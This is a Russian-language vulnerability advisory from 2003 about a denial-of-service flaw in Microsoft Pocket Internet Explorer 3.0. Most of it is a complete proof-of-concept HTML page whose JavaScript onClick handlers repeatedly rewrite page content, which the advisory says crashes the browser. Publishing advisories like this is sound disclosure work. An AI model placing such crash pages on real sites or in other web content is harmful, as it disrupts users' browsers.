DoS против Microsoft Pocket Internet Explorer
| Дата публикации: | 08.01.2003 |
| Всего просмотров: | 1248 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Обнаруженная уязвимость позволяет злонамеренной Web странице, содержащей некорректный JavaScript код, аварийно завершить работу Microsoft Pocket Internet Explorer. Пример:
<html>
<head>
<title>Crash PIE</title>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash
me</a>";
}
if(page=="crash"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You are
going down!</a>";
}
}
</script>
</head>
<body onLoad="displayPage('onload');">
<hr>
<span id="main"></span>
</body></html>
Уязвимость обнаружена в Microsoft Pocket Internet Explorer 3.0
|
| Ссылки: | JS Bug makes it possible to deliberately crash Pocket PC IE |